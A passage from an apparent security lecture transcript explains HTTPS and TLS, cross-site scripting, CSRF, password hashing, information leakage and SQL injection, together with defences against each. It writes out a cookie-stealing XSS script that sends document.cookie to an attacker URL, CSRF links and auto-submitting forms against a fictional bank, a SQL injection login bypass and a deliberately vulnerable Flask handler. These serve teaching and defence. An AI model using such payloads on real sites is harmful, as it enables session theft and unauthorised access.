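        while chunk := sock.recv(4096):
            response += chunk

    print(response.split(b"\r\n")[0].decode())  # status line, e.g. HTTP/1.1 200 OK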

  • But HTTP is not encrypted.

  • And so if we think about making a request to a server,

  • if we're the client on the left and we're

  • making a request to a server on the right, it might go something like this.

  • Because the odds are pretty low that, if we're making a request,

  • we are so close to the server that would serve

  • that request to us that it wouldn't need to hop

  • through any routers along the way.

  • Remember, routers, their purpose in life is

  • to send traffic in the right direction.

  • And they contain a table of information that says,

  • oh, if I'm making a request to some server over there,

  • then the best path is to go here, and then I'll send it over there,

  • and then it will send it there.

  • Their job is to optimize and find the best path

  • to get the request to where it needs to be.

  • So if I'm initiating a request to, as the client, the server,

  • it's going to first go through router A who's

  • going to say, OK, I'm going to move it closer to the server

  • so that it receives that request, goes to router B, goes to router C.

  • And eventually router C perhaps is close enough to the server

  • that it can just hand off the request directly.

  • The server's then going to get that request, read it as HTTP/1.1,

  • look at all the other metadata inside of the request to see if there's anything

  • else that it's being asked for, and then it's going to send the information

  • back.

  • And in this example I'm having it go back

  • exactly through the same chain of routers but in reverse.

  • But in reality, that might be different.

  • It might not go through the exact same three

  • routers in this example in reverse.

  • It might actually take a different path through the routers, depending on traffic

  • that's happening on the network and how congested things are

  • and whether there might be a new path that is better in the amount of time

  • it took to process the request that I asked for.

  • But remember, HTTP, not secured.

  • Not encrypted.

  • This is plain, over-the-air communication.

  • We saw previously, when we took a look at a screenshot

  • from a tool called Wireshark, that it's not

  • that difficult on an unsecured network using an unsecured protocol to read,

  • literally, the contents of those packets going to and from.

  • So that's a vulnerability here for sure.

  • Another vulnerability is any one of these computers

  • along the way could be compromised.

  • So for example, router A perhaps was infected

  • by somebody who-- a router is just a computer as well.

  • So perhaps it was infected by an adversary

  • with some worm that will eventually make it part of some botnet,

  • and it'll eventually start spamming some server somewhere.

  • If router A is compromised in such a way that an adversary can just read all

  • the traffic that flows through it-- and again,

  • we're sending all of our traffic in an unencrypted fashion--

  • then we have another security loophole to deal with.

  • So HTTPS resolves this problem by securing or encrypting

  • all of the communications between a client and a server.

  • So HTTP requests go to one port.

  • We talked about that already.

  • They go to port 80 by convention.

  • HTTPS requests go to port 443 by convention.

  • In order for HTTPS to work, the server is

  • responsible for providing or possessing what's called a valid SSL or TLS

  • certificate.

  • SSL is actually a deprecated technology now.

  • It's been subsumed into TLS.

  • But typically these things are still referred to as SSL certificates.

  • And perhaps you've seen a screen that looks like this when

  • you're trying to visit some website.

  • You get a warning that your connection is not private.

  • And at the very end of that warning, you are

  • informed that the cert date is invalid.

  • Basically this just means that their SSL certificate has expired.

  • Now, what is an SSL certificate?

  • So there are services that work alongside the internet called

  • certificate authorities.

  • GlobalSign, for example, from whom I borrowed these screenshots, is one;

  • GoDaddy, which is also a very popular domain name provider,

  • is also a certificate authority.

  • And what they do is they verify that a particular website owns

  • a particular private key--

  • or excuse me, a particular public key which has a corresponding private key.

  • And the way they do that is the website owner digitally

  • signs something and sends it to the certificate authority.

  • The certificate authority then goes through those exact same checks

  • that we've seen before for digital signatures

  • to verify that, yes, this person must own this public key.

  • And the idea for this is we're trusting that,

  • when I send a communication to you as the website

  • owner using the public key that you say is yours, then it really is yours.

  • There really is somebody out there or some third party

  • that we've decided to collectively trust, the certificate authority, who

  • is going to verify this.

  • Now, why does this matter?

  • Why do we need to verify that someone's public key is what they say it is?

  • Well, it turns out that this idea of asymmetric encryption,

  • or public and private key cryptography that we've previously discussed,

  • does form part of the core of HTTPS.

  • But as we'll see in a moment, we don't actually use public and private keys

  • to communicate except at the very, very beginning of our interaction

  • with some site when we are using HTTPS.

  • So the way this really happens underneath the hood

  • is via the secure sockets layer, SSL, which has now been folded into

  • the overall transport layer security (TLS) protocol.

  • There's other things that are folded into it, but SSL is part of it.

  • And this is what happens.

  • When I am requesting a page from you, and you are the server,

  • and I am requesting this via HTTPS, I am going

  • to initially make a request using the public key that I believe

  • is yours because the certificate authority has

  • vouched for you, saying that I would like to make an encrypted request.

  • And I don't want to send that request over the air.

  • I don't want to send that in the clear.

  • I want to send it to you using the encryption that you say is yours.

  • So I send a request to you, encrypting it using your public key.

  • You receive the request.

  • You decrypt it using your private key.

  • You see, OK, I see now that Doug wants to initiate a request with me,

  • and you're going to fulfill the request.

  • But you're also going to do one other thing.

  • You're going to set a key.

  • And you're going to send me back a key, not

  • your public or private key, a different key, alongside the request that I made.

  • And you're going to send it back to me using my public key.

  • So the initial volley of communications back and forth between us

  • is the same as any other encrypted communication

  • using public and private keys that we've previously seen.

  • I send a message to you using your public key.

  • You decrypt it using your private key.

  • You respond to me using my public key, and I decrypt it using my private key.

  • But this is really slow.

  • If we're just having communications back and forth via mail or even via text,

  • the difference of a few milliseconds is immaterial.

  • We don't really notice it.

  • But on the web, we do notice it, especially

  • if we're making multiple requests or there's

  • multiple packets going back and forth and every single one of them

  • needs to be encrypted.

  • So beyond this initial volley, public and private key encryption

  • is no longer needed because it's no longer used, because it's too slow.

  • We would notice it if we did.

  • Instead, as I mentioned, the server is going to respond with a key.

  • And that key is the key to a cipher.

  • And we've talked about ciphers before and we know that they are reversible.

  • The particular cipher in question here is something called AES.

  • But it is just a cipher.

  • It is reversible.

  • And the key that you receive is the key that you

  • are supposed to use to decrypt all future communications.

  • This key is called the session key.

  • And you use it to decrypt all future communications

  • and use it to encrypt all future communications to the server

  • until the session, so-called, is terminated.

  • And the session is basically as long as you're on the site

  • and you haven't logged out or closed the window.

  • That is the idea of a session.

  • It is one singular experience with a page

  • or with a set of pages that are all part of the same domain name.

  • We're just going to use a cipher for the rest of the time that we talk.
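
Here is a minimal sketch of that hybrid pattern using the third-party Python package cryptography: public-key encryption is used once to share a random session key, and a fast symmetric cipher (AES) protects everything afterwards. Real TLS negotiates its session keys differently (typically with a Diffie-Hellman exchange), but the slow-handshake, fast-session split is the same idea.

    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding, rsa
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    # Server's long-term key pair (its public half is what the certificate vouches for).
    server_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    server_public = server_private.public_key()

    # Client picks a random session key and sends it wrapped with the server's public key.
    session_key = AESGCM.generate_key(bit_length=128)
    oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped = server_public.encrypt(session_key, oaep)

    # Server unwraps it with its private key; both sides now share the session key.
    shared = server_private.decrypt(wrapped, oaep)

    # All further traffic uses the fast symmetric cipher.
    aesgcm = AESGCM(shared)
    nonce = os.urandom(12)
    ciphertext = aesgcm.encrypt(nonce, b"GET /account HTTP/1.1", None)
    print(aesgcm.decrypt(nonce, ciphertext, None))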

  • Now, this may seem insecure for reasons we've

  • talked about when we talked about ciphers

  • and how they are inherently flawed.

  • Recall that when we were talking about some of the really early ciphers,

  • those are classic ciphers like Caesar and Vigenere,

  • those are very easy to break.

  • AES is much more complex than that.

  • And the other upside is that this key, like I mentioned,

  • is only good for a session.

  • So in the unlikely event that the server chooses a bad key-- for example, if we

  • think about it as if it were Caesar, a key of zero,

  • which doesn't actually shift the letters at all, would be a very bad key--

  • even if the key is compromised,

  • it's only good for a particular session.

  • That's not a very long amount of time.

  • But the upside is the ability to encipher

  • and decipher information is much faster.

  • If it's reversible, it's pretty quick to do some mathematical manipulation

  • and transform it into something that looks obscured and gibberish

  • and to undo that as well.

  • And so even though public and private keys are

  • what we consider effectively unbreakable, to the point

  • that it's mathematically untenable to crack a message encrypted using

  • public and private key encryption,

  • we don't rely on them for the bulk of SSL, because it is impractical to expect

  • communications to go that slowly.

  • And so we do fall back on these ciphers.

  • And that really is when you're using secured encrypted communication

  • via HTTPS.

  • You're just relying on a cipher that just

  • happens to be a very, very fancy cipher that should hypothetically

  • be very difficult to figure out the key to as well.

  • You may have also seen a few changes in your browser, especially recently.

  • This screenshot shows a couple of changes

  • that are designed to warn you when you are not using HTTPS encryption.

  • And it's not necessary to use HTTPS for every interaction you

  • have on the internet.

  • For example, if you are going to a site that is purely informational,

  • it's just static content, it's just a list of information, there's no login,

  • there's no buying, there's no clicking on things that might then get tracked,

  • for example, it's not really necessary to use HTTPS.

  • So don't be necessarily alarmed if you visit a site

  • and you're warned that it's not secure.

  • We're told that over time this will turn red and become perhaps even

  • more concerning as more versions of this come out

  • and as more and more adopters of HTTPS exist as well.

  • But you're going to start getting notifications.

  • And you may have seen these as well in green.

  • If you are using HTTPS and you log into something,

  • you'll see a little lock icon here and you'll be told that it is secure.

  • And again, this is just because human beings

  • tend not to be as concerned about their digital privacy

  • and their digital security when using the internet.

  • And now the technology is trying to provide clues and tips

  • to entice you to be more concerned about these things.

  • Now let's take a look at a couple of attacks

  • that are derived from things we typically consider

  • to be advantages of using the internet.

  • The first of these is the idea of cross-site scripting, XSS.

  • We've previously discussed this idea of the distinction

  • between server-side code and client-side code.

  • Client-side code, recall, is something that runs locally

  • on our computer where our browser, for example,

  • is expected to interpret and execute that code.

  • Server-side code is run on the server.

  • And when we get information from a server,

  • we're not getting back the actual lines of code.

  • We're getting back the output of that code having run in the first place.

  • So for example, there might be some code on the server, some Python code or PHP

  • code that generates HTML for us.

  • The actual Python or PHP code in this example would be server-side code.

  • We don't actually ever see that code.

  • We only see the output of that code.

  • A cross-site scripting vulnerability exists when

  • an adversary is able to trick a client's browser into running something locally,

  • and that something does what the person, the client,

  • presumably didn't actually intend to do.

  • Let's take a look at an example of this using a very simple web

  • server called Flask.

  • We have here some Python code.

  • And don't be too worried if this doesn't all make sense to you.

  • It's just a pretty short, simple web server that does two things.

  • So this is just some bookkeeping stuff in Flask.

  • And Flask is a Python package that is used to create web servers.

  • This web server has two things, though, that it does.

  • The first is when I visit slash on my web server--

  • so let's say this is Doug's site.

  • If I go to dougssite.com/-- you may not actually explicitly type

  • the trailing slash anymore, but most browsers just add it--

  • slash just means the root page of your server.

  • I'm going to call the following function whose name happens

  • to be called index in this case.

  • Return hello world.

  • And what this basically means is if I visit dougspage.com/,

  • what I receive is an HTML page whose content is just hello world.

  • So it's just an HTML file that says hello world.

  • Again, this code here is all server-side code.

  • You don't actually see this code.

  • You only see the output of this code, which is this here, this HTML.

  • It's just a simple string in this case, but it would

  • be interpreted by the browser as HTML.

  • If, however, I get a 404--

  • a 404 is a not found error; it means the page I requested doesn't exist.

  • And since I've only defined the behavior for literally one page,

  • slash the index page of my server, then I want to call this function not found.

  • Return not found plus whatever page I tried to visit.

  • So it basically is another very simple page, much like hello world here,

  • where instead of saying hello world, it says not found.

  • And then it also concatenates onto the very end of that whatever page

  • I tried to visit.
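
Roughly, the little server being described might look like the sketch below; the exact file isn't shown in the transcript, so the wording here is approximate.

    from flask import Flask, request

    app = Flask(__name__)

    @app.route("/")
    def index():
        # Visiting the root page just returns this string as the page's HTML.
        return "hello, world"

    @app.errorhandler(404)
    def not_found(error):
        # Echoing request.path straight back into the page is the vulnerability:
        # whatever the visitor typed after the domain name gets interpreted
        # as HTML by their browser.
        return "Not found: " + request.path, 404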

  • This is a major cross-site scripting vulnerability.

  • And let's see why.

  • Let's imagine I go to /foo, so dougspage.com/foo.

  • Recall that our error handler function, which I've reproduced down here,

  • will return not found /foo.

  • Seems pretty reasonable.

  • It seems like the behavior I expected or intended to have happen.

  • But what about if I go to a page like this one?

  • So this is what I literally type in the browser: dougspage.com/ followed by

  • <script>alert('hi')</script>-- an opening script tag, a call to alert, and a closing script tag.

  • This script tag here looks a lot like HTML.

  • And in fact, when the browser sees this, it will interpret it as HTML.

  • And so by visiting this page I will get returned not found and then everything

  • here except for the leading slash, which means

  • that when I receive this and my client is interpreting the HTML,

  • I'm going to generate an alert.

  • What is an alert?

  • Well, if you've ever gone to a website and had a pop-up box display

  • some information, you have to click OK or click X to make

  • it go away, that's what an alert is.

  • So by visiting this page on my website, I've actually

  • tricked my browser into giving me a JavaScript alert--

  • or I've tricked the browser of whoever visits this page

  • into giving them a JavaScript alert.

  • So that's probably not exactly a good thing.

  • But it can get a little bit more nefarious than that.

  • Let's instead imagine-- instead of having this be on my server,

  • it might be easier to imagine it like this, that this is what I wrote.

  • This script tag here's what I wrote into my Facebook profile, for example.

  • So Facebook gives you the ability to write a short little bio

  • about yourself.

  • Let's imagine that my bio was this script document.write, image source,

  • and then I have a hacker URL and everything.

  • And imagine that I own hacker URL.

  • So I own hacker URL and I wrote this in my Facebook profile.

  • Assuming that Facebook did not defend against cross-site scripting

  • attacks, which they do, but assuming that they did not,

  • anytime somebody visited my profile, their browser

  • would be forced to contend with this script tag here.

  • Why?

  • Because they're trying to visit my profile page.

  • My profile page contains literally these characters which

  • are going to be interpreted as HTML.

  • And it's going to add document.write-- that's a JavaScript way of saying add

  • the following line in addition to the HTML of the page--

  • image source equals hacker url?cookie= and then document.cookie.

  • So imagine that I, again, control hacker URL.

  • Presumably, as somebody who is running a website,

  • I also maintain logs of every time somebody tries to access my website,

  • what page on my site they're trying to visit.

  • If somebody goes to my Facebook profile and executes this,

  • I'm going to get notified via my hacker URL logs that somebody has tried to go

  • to that page ?cookie= and then document.cookie.

  • Now, document.cookie in this case, because this

  • exists on my Facebook profile, is an individual's cookie for Facebook.

  • So here what I am doing-- again, Facebook

  • does defend against cross-site scripting attacks,

  • so this can't actually happen on Facebook.

  • But assuming that they did not defend against them adequately,

  • what I'm basically doing is getting told via my log

  • that somebody tried to visit some page on my URL,

  • but the page that they tried to visit, I'm

  • plugging in and basically stealing the cookie that they use for Facebook.

  • And a cookie, recall, is sort of like a hand stamp.

  • It's basically me, instead of having to re-log

  • into Facebook every time I want to use it, going up to Facebook

  • and saying, here.

  • You've already verified my identity.

  • Just take a look at this, and you get let in.

  • And now I hypothetically know someone else's Facebook cookie.

  • And if I was clever, I could try and use that

  • to change what my Facebook cookie is to that person's Facebook cookie.

  • And then suddenly I'm able to log in and view their profile and act as them.

  • This image tag here is just a clever trick

  • because the idea is that it's trying to pull some resource from my site.

  • It doesn't exist.

  • I don't have a list of all the cookies on Facebook.

  • But I'm being told that somebody is trying to access this URL on my site.

  • So the image tag is just sort of a trick to force

  • it to log something on my hacker URL.

  • But the idea here is that I would be able to steal somebody's Facebook

  • cookie wherever this attack is not well defended against.

  • So what techniques can we use either for our own sites

  • when we are running to avoid cross-site scripting vulnerabilities

  • or to protect against cross-site scripting vulnerabilities?

  • The first technique that we can use is to sanitize, so to speak,

  • all of the inputs that come in to our page.

  • So let's take a look at how exactly we might do this.

  • So it turns out that there are things called

  • HTML entities, which are other ways of representing certain characters in HTML

  • that might be considered special or control characters, so things like,

  • for example, this or this.

  • Typically, when a browser sees a character left

  • angle bracket or right angle bracket, it's

  • going to automatically interpret that as some HTML that it should then process.

  • So in the example I just showed a moment ago,

  • I was using the fact that whenever it sees angle brackets with script

  • around it, they're going to try and interpret whatever

  • is between those tags as a script.

  • One way for me to prevent that from being interpreted as a script

  • is to call this or call this something else other than just left angle bracket

  • and right angle bracket.

  • And it turns out that there are these things called HTML entities that

  • can be used to refer to these characters instead,

  • such that if I sanitize my input in such a way

  • that every time somebody literally typed the character left angle bracket,

  • I had written some code that automatically took that and changed it

  • into ampersand lt;.

  • And then every time somebody wrote a greater than character,

  • or right angle bracket, I changed that in the code to ampersand gt;.

  • Then when my page was responsible for processing or interpreting something,

  • it wouldn't interpret this-- it would still display this character as a left

  • angle bracket or less than-- that's what the lt stands for here--

  • or a right angle bracket, greater than.

  • That's what the gt stands for there.

  • It would literally just show those characters and not treat them as HTML.

  • So that's the idea of what it means to sanitize input when we're talking

  • about HTML entities, for example.
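
As a hedged sketch of what that sanitizing could look like in the same Flask setting, Python's built-in html module can do the entity substitution for us; the handler below is illustrative, not the lecture's code.

```python
# Escape the echoed path so < becomes &lt; and > becomes &gt; before it is
# sent back; an injected <script> tag is then displayed as text, not executed.
import html
from flask import Flask, request

app = Flask(__name__)

@app.errorhandler(404)
def not_found(e):
    return "Not Found: " + html.escape(request.path), 404
```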

  • Another thing that we could do is just disable JavaScript entirely.

  • This would have some upsides and some downsides.

  • The upside is you're pretty protected against cross-site scripting

  • vulnerabilities because they're usually going to be introduced via JavaScript.

  • The downside is JavaScript is pretty convenient.

  • It's nice.

  • It makes for a better user experience.

  • Sometimes there might be parts of our page

  • that just don't work if JavaScript is completely disabled,

  • and so trade-offs there.

  • You're protecting yourself, but you might be doing

  • other sorts of non-material damage.

  • Or we could decide to just handle the JavaScript in a special way.

  • So for example, we might not allow what's

  • called inline JavaScript, for example, like the script tags

  • that I just showed a moment ago.

  • But we might allow JavaScripts written in separate JavaScript files

  • which can also be linked into your HTML pages.

  • So those would be allowed, but inline JavaScript, like what we just saw,

  • would not be allowed.

  • We could sandbox the JavaScript and run it separately somewhere else first

  • to see if it does something weird, and if it doesn't do something weird,

  • then allow it to be displayed.

  • We could also enforce a content security policy.

  • Content security policy is another header

  • that we can add to our HTML pages or HTTP responses.

  • And we can define certain behavior to happen

  • such that we will allow certain lines or certain types of JavaScript through

  • but not others.
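
For instance, a minimal sketch of attaching such a header in Flask might look like this; the policy string shown is just one illustrative choice.

```python
# Attach a Content-Security-Policy header to every response.
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    # Only allow scripts loaded from our own origin; inline <script> tags,
    # like the injected one above, are refused by the browser.
    response.headers["Content-Security-Policy"] = "script-src 'self'"
    return response
```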

  • Now, there's another type of attack that can

  • be used that relies heavily on the fact that we use cookies so extensively,

  • and that is a cross-site request forgery, or a CSRF.

  • Now, cross-site scripting attacks generally

  • involve receiving some content and the client's browser

  • being tricked into doing something locally that it didn't want to do.

  • In a CSRF request, or CSRF attack, rather,

  • the trick is we're relying on the fact that there

  • is a cookie that can be exploited to make

  • an outbound HTTP request that we did not intend to make.

  • And again, this relies extensively on cookies

  • because they are this shorthand, short-form way to log into something.

  • And we can make a fraudulent request appear legitimate

  • if we can rely on someone's cookie.

  • Now, again, if you ever use a cloud service for example,

  • they're going to have CSRF defenses built into them.

  • This is really if you're building a simple site

  • and you don't defend against this.

  • Flask, for example, does not defend against this particularly well,

  • but Flask is a very simple web framework for servers.

  • They're generally going to be much more complicated than that

  • and have much more additional functionality to be more full-featured.
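
To give a sense of what those built-in defenses tend to do, here is a hedged, illustrative sketch of one common approach, a per-session CSRF token checked on every form submission; the route, token handling, and HTML here are assumptions for illustration only.

```python
# A minimal sketch of a per-session CSRF token in Flask (illustrative only).
import secrets
from flask import Flask, request, session, abort

app = Flask(__name__)
app.secret_key = "change-me"  # hypothetical; Flask sessions need a secret key

@app.route("/transfer", methods=["GET", "POST"])
def transfer():
    if request.method == "GET":
        # Hand the browser a fresh random token embedded in the real form.
        session["csrf_token"] = secrets.token_hex(16)
        return f'''<form method="post">
            <input type="hidden" name="csrf_token" value="{session["csrf_token"]}">
            <input type="submit" value="Transfer">
        </form>'''
    # A forged request from another site won't know the token, so reject it.
    if request.form.get("csrf_token") != session.get("csrf_token"):
        abort(403)
    return "Transfer executed"
```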

  • So let's walk through what these cross-site request

  • forgeries might look like.

  • And for context, let's imagine that I send you an email

  • asking you to click on some URL.

  • So you're going to click on this link.

  • It's going to redirect you to some page.

  • Maybe that page looks something like this.

  • It's pretty simple, not much going on here.

  • I have a body.

  • And inside of it I have one more link.

  • And the link is http://hackbank.com/transfer?to=doug&amt=500.

  • Now, perhaps you don't hover over it and see the link at the beginning of it.

  • But maybe you are a customer of Hack Bank.

  • And maybe I know that you're a customer of Hack Bank such that if you click

  • on this link and if you happen to be logged in, and if you happen to have

  • your cookie set for hackbank.com, and this was the way that they actually

  • executed transfers, by having you go to /transfer and say to whom you want

  • to send money and in what amount--

  • And fortunately, most banks don't actually do this.

  • Usually, if you're going to do something that manipulates the database, as this

  • would, because it's going to be transferring some amount of money

  • somewhere, that would be via an HTTP POST request--

  • this is just a straightforward GET request I'm making here.

  • If you were logged in, though, to Hack Bank,

  • or if your cookie for Hack Bank was set

  • and you clicked on this link, hypothetically, a transfer of $500--

  • again, assuming that this was how you did it,

  • you specified a person and you specified an amount--

  • would be transferred from your account to presumably my account.

  • That's probably not something you intended to do.

  • So that would be an example of why this is a cross-site request forgery.

  • It's a legitimate request.

  • It appears that you intended to do this because it came from you.

  • It's using your cookie.

  • But you didn't actually intend for it to happen.

  • Here's another example.

  • You click on the link in my email and you get brought to this page.

  • So there's not actually even a second link to click anymore.

  • Now it's just trying to load an image.

  • Now, looking at this URL, we can tell there's not an image there.

  • It doesn't end in .jpeg or .png or the like.

  • It's the same URL as before.

  • But my browser sees image source equals something and says,

  • well, I'm at least going to try and go to that URL

  • and see if there is an image there to load for you.

  • Again, you just click on the link in the email.

  • This page loads.

  • My browser tries to go to this page, or your browser in this case

  • tries to go to this page to load the image there.

  • But in so doing, it's, again, executing this unintended transfer,

  • relying on your cookie at hackbank.com.

  • Another example of this might be a form.

  • So again, it appears that you click on the link in the email.

  • You get brought to a form that just has now just a button at the bottom of it

  • that says Click Here.

  • And the reason it just has a button, even

  • though there's other stuff written, is that those first two fields are hidden.

  • They are type equals hidden, which means you wouldn't actually

  • see them when you load your browser.

  • Now, contrast this, for example, with a field

  • whose type is text, which you might see if you're doing a straightforward

  • login.

  • You would type characters in and see the actual characters appear.

  • That's text versus a password field where you would

  • type characters in and see all stars.

  • It would visually obscure what you typed.

  • The action of this form, or so to say where the form submits--

  • what happens when you click on the Submit button at the bottom--

  • is the same as before.

  • It's hackbank.com/transfer.

  • And then I'm using these parameters here:

  • to Doug, the amount of $500, Click Here.

  • Now notice I actually am also using a POST request

  • to try to initiate this transfer, again, assuming

  • that this was how Hack Bank structured transfer requests.

  • So if you clicked here and this was otherwise validly structured

  • and you were logged in, or your cookie was valid for Hack Bank,

  • then this would initiate a transfer of $500.

  • And I can play another similar trick to what I did a moment ago with the image

  • by doing something like this where, when the page is loaded,

  • instantly submit this form.

  • So you don't even have to click here anymore.

  • It's just going to go through the document,

  • document being JavaScript's way of referring to the entire web page,

  • find the first form, forms[0], assuming

  • this is the first form on the page, and just submit it.

  • Doesn't matter what else is going on.

  • Just submit this form.

  • That would also initiate transfer if you clicked on that link from my email.

  • So a quick summary of these two different types of attacks.

  • Cross-site scripting attacks, the adversary

  • tricks you into executing code on your browser to do something locally

  • that you probably did not intend.

  • And a cross-site request forgery, something

  • that appears to be a legitimate request from your browser

  • because it's relying on cookies, you're ostensibly logged in in that way,

  • but you don't actually mean to make that request.

  • Now let's talk about a couple of vulnerabilities

  • that exist in the context of a database, which I

  • know you've discussed recently as well.

  • So imagine that I have a table of users on my database

  • that looks like this, that each of them has an ID number, they have a username,

  • and they have a password.

  • Now, the obvious vulnerability here is I really

  • shouldn't be storing my users' passwords like this in the clear.

  • If somebody were to ever hack and get a hold of this database file,

  • that's really, really bad.

  • I am not following best practices to protect my customers' information.

  • So I want to avoid doing that.

  • So instead what I might do, as we've discussed, is hash their passwords,

  • run them through some hash function so that when they're actually stored,

  • they get stored looking something like this.

  • You have no idea what the original password was.

  • And because it's a hash, it's irreversible.

  • You should not be able to undo what I did

  • when I ran through the hash function.

  • But there's actually still a vulnerability here.

  • And the vulnerability here is not technical.

  • It's human again.

  • And the vulnerability that exists here is that we see--

  • we're using a hash function, so it's deterministic.

  • When we pass some data through it, we're going to get the same output every time

  • we pass data through it.

  • And two of our users, Charlie and Eric, have the same hash.

  • And this makes sense, because if we go back a moment,

  • they also had the same actual password when it was stored in plain text.
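
A tiny sketch of why that happens: hashing is deterministic, so the same input always yields the same output. SHA-256 is used here only for illustration.

```python
import hashlib

def hash_password(password: str) -> str:
    # Real systems use a slow, salted password hash (bcrypt, scrypt, argon2);
    # plain SHA-256 is shown only to illustrate determinism.
    return hashlib.sha256(password.encode()).hexdigest()

print(hash_password("password"))  # Charlie's stored hash
print(hash_password("password"))  # Eric's stored hash -- identical output
```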

  • We've gone out of our way to try and defend against that by hashing it.

  • But somebody who gets a hold of this database file, for example,

  • they hack into it, they get it, they'll see two people have the same password.

  • And maybe this is a very small subset of my user base.

  • And maybe there's hundreds of thousands of people.

  • And maybe 10% of them all have the same hash.

  • Well, again, human beings, we are not the best at defending our own stuff.

  • It's a sad truth that the most common password

  • is password followed by some of these other examples we had a second ago.

  • All of these are pretty bad passwords.

  • They're all on the list of some of the most commonly used passwords

  • for all services, which means that if you see a hash like this,

  • it doesn't matter that we have taken steps

  • to protect our users against this.

  • If we see a hash like this many, many times in our database, a clever hacker,

  • a clever adversary might think, oh, well,

  • I'm seeing this password 10% of the time,

  • so I'm going to guess that Charlie's password for the service is 12345

  • and they're wrong.

  • And then they'll maybe try abcdef and they're wrong, and then maybe try

  • password and they're right.

  • And then all of a sudden every time they see that hash, they

  • can assume that the password is password for every single one of those users.

  • So again, nothing we can do as technologists to solve this problem.

  • This is really just getting folks to understand

  • that using different passwords, using non-standard passwords,

  • is really important.

  • That's why we talked about password managers and maybe not even knowing

  • your own passwords in a prior lecture.

  • There's another problem that can exist, though, with databases, in particular,

  • when we see screens like this.

  • So this is a contrived login screen that has a username and password

  • field and a Forgot Password button whose purpose in life

  • is, if you type in your email address and you--

  • which is the username in this case, and you

  • have the Forgot Password box checked, and you try and click login,

  • instead of actually logging you in, it's going to email you, hopefully,

  • a link to change your password, not your actual password, for reasons

  • we previously discussed as well.

  • But what if when we click on this button we see this?

  • OK.

  • We've emailed you a link to change your password.

  • Does that seem inherently problematic?

  • Perhaps not.

  • But what about if you see this as well?

  • Somebody might see this if they're logged in as well.

  • Sorry, no user with that email address.

  • Does that perhaps seem problematic when you compare it against this?

  • This is an example of something called information leakage.

  • Perhaps an adversary has hacked some other database

  • where folks were not being as secure with credentials.

  • And so they have a whole set of email addresses mapped to credentials.

  • And because human beings tend to reuse the same credentials

  • on multiple different services, they are trying different services

  • that they believe that these users might also

  • use using those same username and password combinations.

  • If this is the way that we field these types of forgot password inquiries,

  • we're revealing some information potentially.

  • If Alice is a user, we're now saying, yes, Alice is a user of this.

  • Try this password.

  • If we get something like this, then the adversary might not bother trying.

  • They've realized, oh, Alice is not a user of this service.

  • And even if they're not trying to hack into it, if we do something like this,

  • we're also telling that adversary quite a bit about Alice.

  • Now we know Alice uses this service, and this service, and this service,

  • and not this service.

  • And they can sort of create a picture of who Alice might be.

  • They're sort of using her digital footprint to understand more about her.

  • A better response in this case might be to say something like this,

  • request received.

  • If you're in our system, you'll receive an email with instructions shortly.

  • That's not tipping our hand either way as

  • to whether the user is in the database or not in the database.

  • No information leakage here, and generally a better way

  • to protect our customers' privacy.
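
As a hedged sketch, a handler along these lines would return the same message whether or not the address is registered; the user store and email helper below are hypothetical names introduced for illustration.

```python
from flask import Flask, request

app = Flask(__name__)

registered_users = {"alice@example.com"}   # hypothetical user store

def send_reset_email(email):
    pass                                    # hypothetical email helper

@app.route("/forgot", methods=["POST"])
def forgot():
    email = request.form.get("email", "")
    if email in registered_users:
        send_reset_email(email)
    # Identical response either way, so nothing is leaked about whether
    # the address exists in our system.
    return ("Request received. If you're in our system, "
            "you'll receive an email with instructions shortly.")
```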

  • Now, that's not the only problem that we can have with databases.

  • We've alluded to this idea of SQL injection.

  • And there's this comic that makes the rounds quite a bit

  • when we talk about SQL injection, from a web comic called

  • XKCD, that involves a SQL injection attack, which is basically

  • providing some information that--

  • or providing some text or some query that we want to make to a database

  • where that query actually does something unintended.

  • It actually itself is SQL as opposed to just plugging in some parameter,

  • like what is your name, and then searching the database for that name.

  • Instead of giving you my name, I might give you

  • something that is actually a SQL query that's

  • going to be executed that you don't want me to execute.

  • So let's see an example of how this might work.

  • So here's another simple username and password field.

  • And in this example, I've written my password field poorly intentionally

  • for purposes of the example so that it will actually

  • show you the text that is typed as opposed to showing

  • you stars like a password field should.

  • So this is something that the user sees when they access my site.

  • And perhaps on the back end in the server-side code, inside of Python

  • somewhere I have written a SQL query that looks like the following.

  • When the login button is clicked, execute the following SQL query.

  • SELECT star from users where username equals uname--

  • and uname here in yellow referring to whatever was typed in this box--

  • and password equals pword, where, again, pword

  • is referring to whatever was typed in this box.

  • So we're doing a SQL query to select star from users,

  • get all of the information from the users table

  • where the username equals whatever they typed in that box

  • and the password equals whatever they typed in that box.

  • And so, for example, if I have somebody who

  • logs in with the username Alice and the password

  • 12345, what the query would actually look like with these values plugged

  • into it might look something like this; SELECT star from users where username

  • equals Alice and password equals 12345.

  • If there is nobody with username Alice or Alice's password is not 12345,

  • then this will fail.

  • Both of those conditions need to be true.

  • But what about this?

  • Someone whose username is hacker and their password is 1' or '1' equals '1.

  • That looks pretty weird.

  • And the reason that that looks pretty weird

  • is because this is an attempt to inject SQL,

  • to trick SQL into doing something that is presumably not intended by the code

  • that we wrote.

  • Now, it probably helps to take a look at it plugging the data in

  • to see what exactly this is going to do.

  • SELECT star from users where username equals hacker or--

  • excuse me, and password equals '1' or and so on and so on.

  • Maybe I do have a person whose username actually is hacker,

  • but that's probably not their password.

  • That doesn't matter.

  • I'm still going to be able to log in if I

  • have somebody whose username is hacker.

  • And the reason for that is because of this or.

  • I have sort of short circuited the end of the SQL query.

  • I have this quote mark that demarcates the end of what the user presumably

  • typed in.

  • But I've actually literally typed those into my password

  • to trick SQL such that if hacker's password equals 1,

  • it just happens to literally be the character 1, OK, I have succeeded.

  • I guess that's a really bad password, and I

  • shouldn't be able to log in that way, but maybe that is the case

  • and I'm able to log in.

  • But even if not, this other thing is true.

  • '1' does equal '1'.

  • So as long as somebody whose username is hacker exists in the database,

  • I am now able to log in as hacker because this is true.

  • This part's probably not true, right?

  • It's unlikely that their password is 1.

  • Regardless of what their password is, this part actually is true.

  • It's a very simple SQL injection attack.

  • I'm basically logging in as someone who I'm presumably not supposed

  • to be able to log in as, but it illustrates the kind of thing

  • that could happen.

  • You are allowing people to bypass logins.

  • Now, it could get worse if your database administrator username

  • is admin or something very common.

  • The default for this is typically admin.

  • This would potentially give people the ability

